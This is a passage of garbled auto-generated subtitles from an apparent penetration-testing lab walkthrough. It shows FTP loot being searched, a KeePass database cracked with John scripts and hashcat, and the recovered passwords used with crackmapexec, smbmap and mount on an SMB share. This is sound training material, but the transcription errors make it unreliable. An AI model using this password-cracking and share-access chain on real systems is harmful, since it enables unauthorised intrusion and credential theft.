--> 00:31:48,670 We can see that we can do Tic-Tac user equals the user name. 394 00:31:49,540 --> 00:31:51,040 And it's probably something for passwords. 395 00:31:52,600 --> 00:31:53,080 Yes. 396 00:31:54,910 --> 00:32:08,410 Tic-Tac password, so we could do get in there, user equals FTP, user password equals total, so you'd 397 00:32:08,410 --> 00:32:14,500 see that this double code is breaking the shell because it's actually breaking the shell, interpreting 398 00:32:14,500 --> 00:32:21,340 this double quote, instead of treating it literally so we could try to escape it by putting a backslash 399 00:32:21,340 --> 00:32:21,640 there. 400 00:32:22,480 --> 00:32:25,660 But what I like to do is I just like to put in quotes. 401 00:32:26,500 --> 00:32:30,710 Hopefully the single quote won't be treated as a literal part of the password string itself. 402 00:32:31,750 --> 00:32:34,030 And then lastly, we just need the endpoint 403 00:32:36,820 --> 00:32:39,850 to make sure this works. 404 00:32:39,990 --> 00:32:40,990 Looks like it's working control. 405 00:32:40,990 --> 00:32:41,860 Easy to go big. 406 00:32:42,400 --> 00:32:44,560 Everything is being downloaded right now. 407 00:32:46,280 --> 00:32:51,330 So this is a good sign that we'll wait for this to finish and then we will jump back in, right. 408 00:32:51,530 --> 00:32:55,970 Looks like we have finished its go ahead, kill this top pain. 409 00:32:57,200 --> 00:32:58,010 Let's see what it's called. 410 00:32:58,030 --> 00:33:02,780 The Zero move tally listening that FTB and FTP. 411 00:33:04,730 --> 00:33:06,680 What we have we've got these all these folders. 412 00:33:06,980 --> 00:33:11,960 You know, the easy way to browse through this is to use trade so we don't have it or we can install 413 00:33:11,960 --> 00:33:13,420 it at pseudo apte 414 00:33:16,670 --> 00:33:20,000 search tree, see what it is. 415 00:33:22,940 --> 00:33:24,050 There is something called tree. 416 00:33:26,890 --> 00:33:29,750 Treat this as an indented directory, tree and color. 417 00:33:29,800 --> 00:33:35,260 That's basically what it does, and this is what you install without Athene's Daltry, it's going to 418 00:33:35,260 --> 00:33:38,830 have to install tree duck wire to say yes to all the defaults. 419 00:33:40,000 --> 00:33:40,780 It's grab this 420 00:33:46,720 --> 00:33:50,660 thread so now we can do tree 40 that each. 421 00:33:52,090 --> 00:33:58,090 This actually gives us the the file sizes you tech help. 422 00:33:59,170 --> 00:34:01,300 We can see that we can actually specify the depth 423 00:34:04,270 --> 00:34:07,830 level descender only level directories deep. 424 00:34:07,840 --> 00:34:08,020 Right. 425 00:34:08,020 --> 00:34:12,910 Because if we do a tree like this, in this case, it's not too bad. 426 00:34:13,150 --> 00:34:17,320 But if you have a lot of folders and files that are nested, it can take a really, really long time. 427 00:34:17,890 --> 00:34:18,170 Right. 428 00:34:18,190 --> 00:34:19,810 So let's see what we have. 429 00:34:20,380 --> 00:34:24,040 And we've got 27 directories and 230 files. 430 00:34:25,150 --> 00:34:30,790 And the one is sticking up to me right away is in Tim's folder under a folder called Files. 431 00:34:31,840 --> 00:34:36,490 There is keyboards which if you didn't know Keypads is a password manager. 432 00:34:37,790 --> 00:34:39,640 For example, if I go to brb, take this off 433 00:34:42,480 --> 00:34:43,690 declasse, just Google. 434 00:34:43,800 --> 00:34:50,860 It keeps a password safe, free, open source password manager primarily for Windows, but it's also 435 00:34:50,860 --> 00:34:53,980 supported on the Linux operating system through the use of motto. 436 00:34:54,640 --> 00:35:00,730 I don't want my no, I don't know why the heck they named it that, considering that motto is a disease 437 00:35:01,300 --> 00:35:01,820 anyway. 438 00:35:02,200 --> 00:35:04,330 So we've got we can get keep us. 439 00:35:08,050 --> 00:35:14,020 And this is what we should do now, we could very quickly to scroll up, see what else we have, a bunch 440 00:35:14,020 --> 00:35:15,700 of FTP files, log files. 441 00:35:16,510 --> 00:35:24,040 If we do try again with the tech age to put it in human readable format for the class sizes, we can 442 00:35:24,040 --> 00:35:26,640 scroll up and take a look at how big these files it's they're all the same. 443 00:35:27,130 --> 00:35:33,130 Twenty eight k got a binder in here, Firefox maybe that the target environment is using Firefox, this 444 00:35:33,130 --> 00:35:35,950 particular version so we could look for it exploits against that version. 445 00:35:37,690 --> 00:35:41,590 A few other 94 KB files in this folder 446 00:35:44,500 --> 00:35:45,190 is file. 447 00:35:45,200 --> 00:35:46,720 We could try to open that. 448 00:35:48,310 --> 00:35:53,410 There might be some sensitive information in there, maybe some credentials, but a PDF. 449 00:35:56,350 --> 00:36:03,830 I see a new folder that doesn't go anywhere, so we don't need to go in there and that's about it. 450 00:36:03,850 --> 00:36:10,420 So I think where we should go right now, the data is telling us we should go to Tim files and then 451 00:36:10,660 --> 00:36:12,880 look at this, Tim, that cutbacks. 452 00:36:12,890 --> 00:36:13,720 I wonder what that is. 453 00:36:14,800 --> 00:36:18,520 C C users. 454 00:36:19,090 --> 00:36:23,320 Tim files this file. 455 00:36:23,380 --> 00:36:28,630 Tim, we can keep our database manager. 456 00:36:29,620 --> 00:36:29,980 Right. 457 00:36:31,090 --> 00:36:32,710 This is actually the database itself. 458 00:36:33,130 --> 00:36:38,900 So first we need to install keypad keyboards because I don't think we have it yet. 459 00:36:38,920 --> 00:36:39,820 We don't have it right now. 460 00:36:40,270 --> 00:36:42,030 Zero apt search. 461 00:36:42,170 --> 00:36:42,970 Keep us. 462 00:36:45,920 --> 00:36:50,540 We can now keep house to keep house X, 463 00:36:53,300 --> 00:37:01,060 see, I don't think it really matters which when we get there, get kibbitz X, it sounds cool. 464 00:37:08,890 --> 00:37:13,840 And then let's move this file to 465 00:37:18,040 --> 00:37:18,870 the root right here. 466 00:37:29,540 --> 00:37:30,740 Yeah, this right here. 467 00:37:33,930 --> 00:37:41,880 Oh, you know what happened, so, yeah, so basically what I tried to do, so KDDI Bengalla, it tries 468 00:37:41,880 --> 00:37:46,260 to refer to the last part of the last command and I was then trying to copy into that. 469 00:37:46,260 --> 00:37:54,360 But there's no folder called till date forward slash boxes for slash tally for Slashdot. 470 00:37:55,050 --> 00:38:01,110 This folder exists without the dot right there, just the home to write off any working directory. 471 00:38:02,400 --> 00:38:10,590 This refers to the day this character here and then this is a folder that exists, but his dad doesn't. 472 00:38:10,620 --> 00:38:16,320 So then when I did see the dollar being trying to go to this last part of the last command, which doesn't 473 00:38:16,320 --> 00:38:16,770 exist. 474 00:38:17,850 --> 00:38:22,980 So I bet if I didn't include that, it would have taken me into that folder, which is what I wanted. 475 00:38:24,000 --> 00:38:30,420 So that's just a little bashful for people that like to know about pretty cool commands and stuff that 476 00:38:30,420 --> 00:38:32,190 you can do about anyway. 477 00:38:32,670 --> 00:38:34,080 And we should have copied it up. 478 00:38:34,080 --> 00:38:46,650 So it's go to boxes tally and we have it there and we should have keypads now keep at X. 479 00:38:47,400 --> 00:38:49,260 We're just going to point it to this directory here. 480 00:38:49,560 --> 00:38:51,360 So database open database 481 00:38:53,700 --> 00:38:56,670 boxes tally so we can get open. 482 00:38:58,320 --> 00:39:04,950 Nice, except we don't have a password unable to open the database Ronke or database files corrupt. 483 00:39:07,980 --> 00:39:13,740 So what are we going to do on to brute force this that would take forever or we could look at 484 00:39:16,590 --> 00:39:17,790 some scripts from to John. 485 00:39:19,750 --> 00:39:19,870 Right. 486 00:39:19,920 --> 00:39:23,670 So John is a password cracker and includes all these scripts that you can use to convert different things 487 00:39:23,670 --> 00:39:26,460 to a format that John can use so that he can crack it. 488 00:39:27,390 --> 00:39:31,140 So we can look to see if there is a like a key pass. 489 00:39:31,140 --> 00:39:31,950 DeJohn there is. 490 00:39:32,100 --> 00:39:36,210 I just typed key parts and they are completed. 491 00:39:39,210 --> 00:39:48,420 So that is definitely a file and we can put in the database name and part 1.0 scap what I want to do 492 00:39:48,420 --> 00:39:48,660 that 493 00:39:51,630 --> 00:39:52,590 I didn't need to consider. 494 00:39:52,890 --> 00:39:59,520 OK, here we have the hash format so now we can crack this in John or we can use hash tag which is my 495 00:39:59,520 --> 00:39:59,840 favorite. 496 00:39:59,850 --> 00:40:03,720 I like using hash tags so we still control AC a comma. 497 00:40:04,770 --> 00:40:05,880 Let's do brute force. 498 00:40:06,420 --> 00:40:10,620 Brute force technically is not brute force a dictionary attack. 499 00:40:13,140 --> 00:40:20,910 Let's be lexically correct and then let's do it until a olszewski to log everything we're doing here. 500 00:40:22,020 --> 00:40:22,770 We have hash cat. 501 00:40:24,630 --> 00:40:24,990 We do. 502 00:40:24,990 --> 00:40:26,370 We have version six one on one. 503 00:40:27,080 --> 00:40:34,840 Now let's go ahead and grab for example hashes show an example hash for each hash mo. 504 00:40:34,860 --> 00:40:35,520 That's what we want. 505 00:40:35,520 --> 00:40:41,100 So we want to go up and let's see what he's able hashes. 506 00:40:41,100 --> 00:40:44,280 We get we get way too many. 507 00:40:44,460 --> 00:40:52,740 So let's do a grab for like key pass and we see a hash and we see a type, but we don't get the mode. 508 00:40:53,190 --> 00:40:57,930 Notice, if you look at the format up here, you have a hash before that you have a type in the before 509 00:40:57,930 --> 00:40:58,620 that you have a mode. 510 00:40:58,630 --> 00:41:00,750 So we want to go before by maybe one. 511 00:41:01,590 --> 00:41:01,960 Right. 512 00:41:01,970 --> 00:41:05,730 So we can do to be four before go before one line. 513 00:41:08,820 --> 00:41:12,900 And now we have the mode, so technically we have what we need, we just need to put this hash in a 514 00:41:12,900 --> 00:41:13,320 file. 515 00:41:15,690 --> 00:41:16,590 Let's put the pain. 516 00:41:18,110 --> 00:41:21,740 Let's get off them hash text. 517 00:41:24,390 --> 00:41:27,750 Which of the does not look right. 518 00:41:33,020 --> 00:41:34,200 And that's what I said. 519 00:41:34,210 --> 00:41:35,590 Look, that's what it should look like. 520 00:41:35,620 --> 00:41:37,660 It starts with Tim, I'm sure. 521 00:41:37,680 --> 00:41:38,730 Why I didn't grab everything. 522 00:41:40,740 --> 00:41:43,100 Let's go back then. 523 00:41:43,140 --> 00:41:43,840 I control. 524 00:41:43,890 --> 00:41:44,370 Should be. 525 00:41:44,550 --> 00:41:45,060 There we go. 526 00:41:46,290 --> 00:41:47,340 Now that just reminds me. 527 00:41:47,900 --> 00:41:52,640 This starts with Tim, the user we want to crack, but the format Hashmat wants does not. 528 00:41:52,650 --> 00:41:53,840 It starts with dollar. 529 00:41:53,870 --> 00:41:54,780 Keeps dollar. 530 00:42:00,040 --> 00:42:03,760 So this is a little bit different. 531 00:42:05,620 --> 00:42:10,950 This is dollar keeps dollar here, so we probably need to truncate or sort of remove this temporary 532 00:42:10,960 --> 00:42:13,810 fix or perhaps get to crack it 533 00:42:17,260 --> 00:42:25,720 price tag twice to get to the beginning of the document shift. 534 00:42:25,840 --> 00:42:26,730 Easy to save. 535 00:42:27,390 --> 00:42:29,050 It's now a conditional cash card. 536 00:42:29,990 --> 00:42:41,740 The mode is 13, 400 control of the hashes. 537 00:42:41,740 --> 00:42:43,790 And then we need the word list. 538 00:42:45,020 --> 00:42:46,210 I'm not sure we have 539 00:42:48,880 --> 00:42:49,120 now. 540 00:42:49,120 --> 00:42:53,170 We have the compressed form of the list. 541 00:42:55,210 --> 00:43:07,270 But this is not a very it's not it's going to be it's very resource intensive to crack something like 542 00:43:07,270 --> 00:43:07,600 this. 543 00:43:11,200 --> 00:43:17,140 And then what I want to do is I just want to run against this to show you the size. 544 00:43:18,610 --> 00:43:19,360 Fifty one megabyte. 545 00:43:19,360 --> 00:43:19,680 Right. 546 00:43:19,690 --> 00:43:20,440 Compressed. 547 00:43:21,370 --> 00:43:25,660 So we need the rocky text uncompressed, which will give us better performance. 548 00:43:34,960 --> 00:43:36,100 And of course you know where I'm going. 549 00:43:36,100 --> 00:43:38,250 I'm going to Google up. 550 00:43:38,280 --> 00:43:39,160 That's throwing the word. 551 00:43:44,590 --> 00:43:50,260 They we go and make this is it says native Cattail, I'm pretty sure this is what I want. 552 00:43:50,980 --> 00:43:53,850 File should be like a hundred and thirty six megabytes or something like that. 553 00:43:54,930 --> 00:43:55,890 One hundred thirty three. 554 00:43:56,350 --> 00:43:56,950 So we'll save it. 555 00:44:02,310 --> 00:44:10,950 Right, downloading, let's go ahead and get ready to pull it over, zero move downloads, cued our 556 00:44:10,960 --> 00:44:12,720 text, put it right here. 557 00:44:13,290 --> 00:44:14,520 So we put that down to finish. 558 00:44:19,150 --> 00:44:22,080 OK, you. 559 00:44:25,840 --> 00:44:30,040 Seek to complete the works, to complete works, at least, and what does it say? 560 00:44:32,440 --> 00:44:35,960 Has that takes your mind once or something's wrong with this format, so it has to take. 561 00:44:38,080 --> 00:44:39,460 Yeah, I didn't copy of it correctly. 562 00:44:40,570 --> 00:44:44,230 You see here it looks like this. 563 00:44:44,230 --> 00:44:46,200 It starts with keep US dollar here. 564 00:44:46,200 --> 00:44:47,500 It's showing something completely different. 565 00:44:47,510 --> 00:44:51,880 So let's go back to what we're doing. 566 00:44:53,630 --> 00:44:54,780 Where are we here. 567 00:44:54,790 --> 00:44:55,200 Yes. 568 00:44:55,420 --> 00:44:56,080 About this again. 569 00:44:56,800 --> 00:45:02,560 Right from you know, right from that dollar sign to the end. 570 00:45:03,700 --> 00:45:03,940 Right. 571 00:45:03,940 --> 00:45:07,930 Click copy control eight three to switch over to them. 572 00:45:09,520 --> 00:45:16,510 Has that text at least the line I Josephite put it back. 573 00:45:16,540 --> 00:45:17,200 It looks good. 574 00:45:17,470 --> 00:45:18,670 Escape easy. 575 00:45:19,510 --> 00:45:21,670 Up, up, up front. 576 00:45:22,630 --> 00:45:23,800 Yes, that's what we want. 577 00:45:23,800 --> 00:45:25,510 So to exit this one. 578 00:45:26,230 --> 00:45:27,940 What hash can't do its thing. 579 00:45:29,560 --> 00:45:30,610 Very, very awesome. 580 00:45:30,850 --> 00:45:38,050 So you can see how QCAT finished used rocket attacks to check this many passwords, which looks like 581 00:45:38,050 --> 00:45:40,450 it is fourteen million lines 582 00:45:43,390 --> 00:45:48,160 and it looks like it took between fourteen 38 and fourteen thirty six. 583 00:45:48,160 --> 00:45:51,340 So it's like about two minutes to run again. 584 00:45:51,340 --> 00:45:59,200 I'm actually running this in a virtual machine, so if I show you the specs on this guy you open this 585 00:45:59,200 --> 00:45:59,620 pain up. 586 00:46:04,390 --> 00:46:08,230 Right, click settings, you can see what I'm working with. 587 00:46:08,410 --> 00:46:15,250 I don't have a special tracking rig, you know, with the multiple Invidia, you know, G Force, CPU's 588 00:46:15,250 --> 00:46:15,940 and all that stuff. 589 00:46:16,250 --> 00:46:24,290 Got four gigabytes of memory to CPU's and 40 gigabyte hard drive as far as the advanced features go. 590 00:46:24,910 --> 00:46:29,530 You know, I'm not using Zaytoun medications for help or being able to hosts, which improves my performance 591 00:46:29,530 --> 00:46:29,980 a little bit. 592 00:46:30,460 --> 00:46:32,830 This is my workstation 16. 593 00:46:33,130 --> 00:46:37,720 So your mileage may vary, but that's pretty much what I found. 594 00:46:37,720 --> 00:46:39,130 So you might be wondering, where's the password? 595 00:46:39,710 --> 00:46:40,420 It's actually right here. 596 00:46:41,790 --> 00:46:48,510 At the end of the string, by the way, you could also find it if you, for example, to see to this 597 00:46:49,020 --> 00:46:54,720 and you want to find it again without really cracking, you could just type show and we show it. 598 00:46:56,730 --> 00:47:01,140 Now, one other thing we could do is if you want to know where this was inside of the file, you could 599 00:47:01,140 --> 00:47:04,620 do like grep minus AI in 600 00:47:07,230 --> 00:47:07,830 regex. 601 00:47:07,830 --> 00:47:15,300 So it starts with simple Monteil and ends with that. 602 00:47:15,330 --> 00:47:21,030 So this word is on the line by itself and we want to search and rescue and we can see it actually came 603 00:47:21,030 --> 00:47:22,260 up with a bunch of different lines. 604 00:47:23,010 --> 00:47:28,260 But the one that we found was right here on line twenty four thousand six hundred eighty eight. 605 00:47:29,940 --> 00:47:30,590 So that's kind of cool. 606 00:47:32,090 --> 00:47:33,300 All right, so now what do we do with this? 607 00:47:33,320 --> 00:47:36,080 Well, we've got a credit score and put it in our credential file, 608 00:47:43,270 --> 00:47:49,250 keep our vault has cracked the hash cat. 609 00:47:50,180 --> 00:47:50,510 Right. 610 00:47:50,710 --> 00:47:51,380 That's we want. 611 00:47:53,300 --> 00:47:56,090 And now let's go over to keep asking. 612 00:47:56,090 --> 00:47:56,850 We still have it running. 613 00:47:56,870 --> 00:47:57,740 I don't think we do. 614 00:47:58,650 --> 00:48:03,980 Let's go ahead and launch it live in the dark theme. 615 00:48:05,300 --> 00:48:07,060 That is, I'm a huge fan of dark themes. 616 00:48:07,960 --> 00:48:10,520 It doesn't cost them right. 617 00:48:10,580 --> 00:48:12,260 Click the eyeball to make sure we get it in the correctly. 618 00:48:12,260 --> 00:48:13,130 We do OK. 619 00:48:14,420 --> 00:48:16,500 And bam, we're inside now. 620 00:48:16,590 --> 00:48:17,870 Nothing in the personal directory. 621 00:48:17,870 --> 00:48:21,920 We can keep browsing through these directories and see what we find them. 622 00:48:21,920 --> 00:48:22,880 We've got something here. 623 00:48:24,300 --> 00:48:25,790 Finance, do you see? 624 00:48:28,640 --> 00:48:29,540 And we've got a grid. 625 00:48:30,530 --> 00:48:32,930 And if you look at this, it says tally aked share. 626 00:48:32,930 --> 00:48:39,290 This is probably SMB share so we can make note of that zero Democrats. 627 00:48:44,360 --> 00:48:46,390 Gee, I support that wrong. 628 00:48:46,940 --> 00:48:47,420 There we go. 629 00:48:48,080 --> 00:48:49,310 Keep us involved 630 00:48:52,520 --> 00:48:53,060 inside. 631 00:48:53,060 --> 00:48:53,600 Keep as well. 632 00:48:53,610 --> 00:48:55,160 It should be. 633 00:48:56,840 --> 00:48:58,220 And it was finance 634 00:49:05,360 --> 00:49:06,350 credit for 635 00:49:09,200 --> 00:49:10,820 aked share. 636 00:49:13,460 --> 00:49:14,060 That's good, right. 637 00:49:15,140 --> 00:49:15,620 All right. 638 00:49:15,950 --> 00:49:19,060 So we're going to do we're going to try to go here. 639 00:49:19,070 --> 00:49:20,150 Let's see if we are pragmatic. 640 00:49:20,150 --> 00:49:27,160 Zach, we don't see the App Store credit map, exactly how that work, never actually trying to install 641 00:49:27,160 --> 00:49:27,590 it that way. 642 00:49:27,950 --> 00:49:32,840 So in case you're wondering what crack map is, try saying that ten times fast. 643 00:49:33,800 --> 00:49:40,400 And it's sort of like a Swiss Army knife Penn testing tool for Engagement's. 644 00:49:40,400 --> 00:49:43,340 You can do a bunch of different things, a bunch of network based attacks. 645 00:49:44,900 --> 00:49:51,320 You know, there's a lot of there's a lot of work to put into this, particularly by by Bleeder, who 646 00:49:51,320 --> 00:49:52,640 is pretty awesome. 647 00:49:53,330 --> 00:49:55,310 And but, you know, we can look at this tool, we can use it. 648 00:49:55,670 --> 00:49:58,520 And we're just basically trying to see what we can do with these S&P shares. 649 00:49:58,820 --> 00:49:59,090 Right. 650 00:49:59,090 --> 00:50:04,610 Can we can we log in to the target using the credentials that we discovered in the past, keep passed, 651 00:50:04,610 --> 00:50:05,260 password pulled. 652 00:50:06,860 --> 00:50:07,940 This tool is legit. 653 00:50:08,480 --> 00:50:08,810 All right. 654 00:50:08,810 --> 00:50:14,690 So let's just make sure, by the way, wherever you see black, how a Black Hills, you know, it's 655 00:50:14,690 --> 00:50:16,460 legit enough said. 656 00:50:16,970 --> 00:50:20,900 And I don't work for Black Hills, which is really that good. 657 00:50:21,200 --> 00:50:25,400 OK, so let's go ahead and see what's going on here. 658 00:50:25,400 --> 00:50:28,700 They're still in stalling, so wait for this to finish and then we'll jump back in. 659 00:50:30,170 --> 00:50:30,470 All right. 660 00:50:30,470 --> 00:50:31,280 So this is done. 661 00:50:31,400 --> 00:50:33,020 Let's see if we can run a crack map. 662 00:50:33,020 --> 00:50:33,530 Exactly. 663 00:50:33,530 --> 00:50:34,100 We can. 664 00:50:35,130 --> 00:50:42,170 This is a beast of a tool, so we don't want to get too deep in there, but we do want to run some useful 665 00:50:42,170 --> 00:50:42,500 command. 666 00:50:42,500 --> 00:50:46,540 So it's run like that help, which I just ran. 667 00:50:47,000 --> 00:50:48,260 So I just repeat it myself. 668 00:50:48,380 --> 00:50:48,710 Great. 669 00:50:51,190 --> 00:50:59,470 Now, there used to be an SMB command here, which I don't see what sort of app to search to me. 670 00:50:59,500 --> 00:51:00,790 I don't know if this is what I think it is. 671 00:51:14,730 --> 00:51:20,830 If you see here, see me check or edit configuration data with config model, this is not what we wanted. 672 00:51:21,970 --> 00:51:22,960 That is hilarious. 673 00:51:23,500 --> 00:51:30,970 So let's go to their website and let's see the correct way to install this. 674 00:51:33,280 --> 00:51:41,550 Casey, we could use a doctor and we could use payback's which says it's also pretty easy, so let's 675 00:51:41,570 --> 00:51:42,470 just go and do this. 676 00:51:44,990 --> 00:51:45,470 This method. 677 00:52:01,150 --> 00:52:03,460 Buybacks ensure our path. 678 00:52:06,130 --> 00:52:11,260 And then lastly, buybacks and stop cracking that exact. 679 00:52:16,630 --> 00:52:26,380 OK, it was not created because insurer PIP is not available to me to install that pseudo app store 680 00:52:26,410 --> 00:52:28,210 Python three and. 681 00:52:36,480 --> 00:52:39,540 I forgot how much of a beast crack my executives to install. 682 00:52:44,480 --> 00:52:49,160 Oh, right, so SEEMY is now available and correct. 683 00:52:49,520 --> 00:52:50,180 Exactly. 684 00:52:50,210 --> 00:52:52,510 I love the emoticons down here supercool. 685 00:52:52,910 --> 00:52:54,020 I wonder how they're doing that. 686 00:52:54,020 --> 00:53:01,790 So we should be able to run and we don't want to do originally rename this, by the way, to see me. 687 00:53:03,920 --> 00:53:05,090 So you don't see any. 688 00:53:10,890 --> 00:53:17,070 Because we have the other command still there to do this, you know, crack a map. 689 00:53:17,110 --> 00:53:17,800 Exactly. 690 00:53:18,870 --> 00:53:19,440 That works. 691 00:53:21,300 --> 00:53:21,720 All right. 692 00:53:21,730 --> 00:53:22,260 That's what I want. 693 00:53:23,310 --> 00:53:30,750 OK, so what we want to do now is run SMB right to what we could do is go back to its previous command 694 00:53:34,470 --> 00:53:37,140 and just change this to crack a map. 695 00:53:37,150 --> 00:53:37,670 Exactly. 696 00:53:38,370 --> 00:53:39,690 See if this gets us what we want. 697 00:53:40,760 --> 00:53:41,250 It does. 698 00:53:41,250 --> 00:53:45,320 So it's running and we can see we've got ready access to the accounting share. 699 00:53:47,100 --> 00:53:48,480 Now what do we want to do here? 700 00:53:48,680 --> 00:53:49,470 Well, we want to read it. 701 00:53:49,800 --> 00:53:50,460 How can we do that? 702 00:53:51,000 --> 00:53:52,440 We can use and be map to do that. 703 00:53:53,220 --> 00:53:53,430 We could. 704 00:53:53,430 --> 00:53:55,310 Do you have exactly as well. 705 00:53:55,320 --> 00:54:01,830 But I like showing off as many tools, tools as possible so that you can really learn how to run an 706 00:54:01,830 --> 00:54:03,450 engagement and how to work. 707 00:54:04,540 --> 00:54:10,520 So zero SMB map have it do it to see what our options are. 708 00:54:11,610 --> 00:54:20,550 We can say tech you finance tech p write your password. 709 00:54:21,780 --> 00:54:24,150 Oops, we don't have a password on our clipboard anymore. 710 00:54:30,370 --> 00:54:31,230 Joseph C.. 711 00:54:35,100 --> 00:54:42,210 Control of the counting and then I believe we just need the host, which is this tech age. 712 00:54:47,640 --> 00:54:48,010 Kelly. 713 00:54:55,890 --> 00:55:03,210 So, again, we see now what we can do is we can actually read it, which I believe we go into the help, 714 00:55:03,210 --> 00:55:06,160 we should see that somewhere here. 715 00:55:06,190 --> 00:55:06,570 Yeah. 716 00:55:07,230 --> 00:55:08,490 What's the contents of the directory? 717 00:55:11,690 --> 00:55:18,590 So we can do take our act if you want to list the contents of this directory. 718 00:55:28,080 --> 00:55:32,280 And you can see a bunch of, again, followers now, you know, I don't want to have to browse through 719 00:55:32,280 --> 00:55:37,320 these folders like this instead, I think it's better if we just mount this entire share locally on 720 00:55:37,320 --> 00:55:39,690 our box and then we can copy everything down. 721 00:55:40,140 --> 00:55:44,310 And my first point of attack is going to be go to this folder migration, because if you remember when 722 00:55:44,310 --> 00:55:51,510 we went and we were exploring the SharePoint site, it's called Migration Update, and that's where 723 00:55:51,510 --> 00:55:55,180 we found these credentials, this laptop user account. 724 00:55:55,200 --> 00:56:00,960 So I think that should be our plan of attack for at least starting things off. 725 00:56:01,680 --> 00:56:16,140 So how are we going to do this new directory to make Directory SMB see the SMB zero mount type service 726 00:56:17,430 --> 00:56:18,090 options? 727 00:56:18,090 --> 00:56:21,060 User name equals finance. 728 00:56:21,840 --> 00:56:25,410 Password equals this. 729 00:56:26,310 --> 00:56:29,400 And what we want to do, we want to mount. 730 00:56:32,100 --> 00:56:40,710 Ten, ten, ten, ten, ten, fifty, nine linked in this current folder. 731 00:56:41,430 --> 00:56:42,060 See that works. 732 00:56:43,260 --> 00:56:44,220 And you see it is bad. 733 00:56:44,220 --> 00:56:48,870 You should see notice that it doesn't have a slash separating the nine and the A. 734 00:56:50,520 --> 00:56:52,590 That's because this forward slashers escaped me. 735 00:56:53,010 --> 00:56:58,870 So we need to escape each flash so that we get a flash here, that makes sense, for example. 736 00:56:58,950 --> 00:57:05,970 But it's last year now I get to here, but I don't get the other flash right. 737 00:57:05,980 --> 00:57:06,630 We need to flash. 738 00:57:06,720 --> 00:57:10,090 So that means I need to put two more slashes to escape Eagle. 739 00:57:11,490 --> 00:57:15,080 It sounds crazy, but that's because Lennix right. 740 00:57:15,090 --> 00:57:16,110 You have to escape the slashers. 741 00:57:16,850 --> 00:57:19,950 So now there's nothing here. 742 00:57:19,950 --> 00:57:23,550 But if we go up there, we go back in. 743 00:57:24,480 --> 00:57:25,170 We have everything. 744 00:57:25,740 --> 00:57:26,930 Obviously a great place for tree. 745 00:57:27,510 --> 00:57:31,110 Are you sure it's going to take a really long time? 746 00:57:31,230 --> 00:57:32,620 Right, Jose? 747 00:57:32,670 --> 00:57:38,220 The stuff that we could set the level to to. 748 00:57:40,680 --> 00:57:43,080 Right level descent, only two levels deep. 749 00:57:44,700 --> 00:57:46,310 So that's a little bit more manageable. 750 00:57:50,030 --> 00:57:54,890 But we already know that we want to start in the migration folder, so let's go into their. 751 00:58:01,770 --> 00:58:02,410 Where am I? 752 00:58:02,700 --> 00:58:03,310 Where am I? 753 00:58:03,600 --> 00:58:04,000 Where am I? 754 00:58:04,020 --> 00:58:04,520 What am I doing? 755 00:58:06,990 --> 00:58:08,880 CD boxes tally. 756 00:58:09,860 --> 00:58:11,150 All right, see me. 757 00:58:11,890 --> 00:58:12,270 All right. 758 00:58:13,950 --> 00:58:14,640 Oh, my gosh. 759 00:58:18,230 --> 00:58:25,220 My question is a little bit slow, that's the problem, there's some lag here to try to get out to. 760 00:58:29,410 --> 00:58:29,660 Right. 761 00:58:29,710 --> 00:58:33,230 Some backup folders and some binary integration. 762 00:58:33,580 --> 00:58:34,480 Let's start back up. 763 00:58:38,260 --> 00:58:38,950 See what's in here. 764 00:58:44,260 --> 00:58:44,660 I don't know. 765 00:58:44,680 --> 00:58:45,940 I mean, we could go deeper into that. 766 00:58:46,030 --> 00:58:50,290 Could do like a tree three three levels deep. 767 00:58:53,570 --> 00:58:58,520 And I'm seeing some things looks like some configuration files, there may be credentials in here, 768 00:58:58,640 --> 00:59:01,520 it could take forever to search through all 70 directories. 769 00:59:02,780 --> 00:59:09,980 So let's go back out let's back up pun intended of the back of directory and. 770 00:59:12,800 --> 00:59:15,110 I'm intrigued and then we've got binaries that's going there. 771 00:59:22,650 --> 00:59:23,730 This is a lot of stuff. 772 00:59:26,470 --> 00:59:31,340 We do we need to exclude the kept files. 773 00:59:31,350 --> 00:59:32,430 Is there a way to do that would treat. 774 00:59:40,330 --> 00:59:49,720 I know the way you do A grep C zero, grep minus color equals always 775 00:59:55,690 --> 00:59:56,500 exclude 776 01:00:00,010 --> 01:00:00,730 anything that ends. 777 01:00:00,760 --> 01:00:07,960 And I can't want to recurse and we just want to search for everything. 778 01:00:08,740 --> 01:00:09,910 Second, I don't even know. 779 01:00:17,280 --> 01:00:22,840 All right, so it's trying to get a little deeper without giving us all the crazy noise. 780 01:00:24,710 --> 01:00:31,900 So we're seeing some executables, we've got Putti and we've got this are pretty set up. 781 01:00:31,940 --> 01:00:35,030 Maybe that's a report set up to Testor. 782 01:00:36,470 --> 01:00:38,200 I don't know what that is. 783 01:00:39,420 --> 01:00:41,360 And maybe we should look into that. 784 01:00:43,190 --> 01:00:46,250 So let's go into S&P warned. 785 01:00:51,300 --> 01:00:52,050 Migration. 786 01:00:55,420 --> 01:00:56,730 Wow, this is really slow. 787 01:01:00,370 --> 01:01:10,180 City boundaries don't make a type of I don't make a typo and create a new folder. 788 01:01:14,320 --> 01:01:20,980 All right, so let's grab this zero copy test to see let's put this in 789 01:01:25,240 --> 01:01:26,170 boxes tally. 790 01:01:30,550 --> 01:01:40,300 What I want to do is do this, given that Dodd said, I want to come back and say this works this time. 791 01:01:43,590 --> 01:01:50,040 It did put it you see it put the command in the last command so we can go there and then let's see if 792 01:01:50,040 --> 01:01:50,850 we can look inside. 793 01:01:53,500 --> 01:01:57,340 Final test today, actually executable. 794 01:01:58,240 --> 01:02:00,430 Let's stop this for now because it's slowing down our box 795 01:02:03,580 --> 01:02:05,010 and let's take a look at this. 796 01:02:05,050 --> 01:02:10,420 So we want to do we could use radar against it. 797 01:02:20,460 --> 01:02:23,880 And this might be a step in the right direction. 798 01:02:24,900 --> 01:02:31,590 This could be overkill because, you know, a lot of times you don't actually need to use a reverse 799 01:02:31,590 --> 01:02:33,660 engineering tool like radar to just find strings. 800 01:02:33,660 --> 01:02:36,030 But sometimes you can find strings in a file that are very helpful. 801 01:02:36,950 --> 01:02:38,160 That's why I wanted to show this. 802 01:02:44,520 --> 01:02:47,820 I was looking through here and again, you know, I'm just looking through here and then immediately 803 01:02:47,820 --> 01:02:52,450 I see what looks like crystals, right? 804 01:02:52,500 --> 01:02:53,100 You can see this. 805 01:02:54,810 --> 01:02:58,200 Now, you don't need to actually disassemble all the code like I just did using radar. 806 01:02:59,310 --> 01:03:01,620 You could take an easier approach. 807 01:03:03,100 --> 01:03:05,280 I'll show you that a second frequenters. 808 01:03:09,210 --> 01:03:13,440 And if we 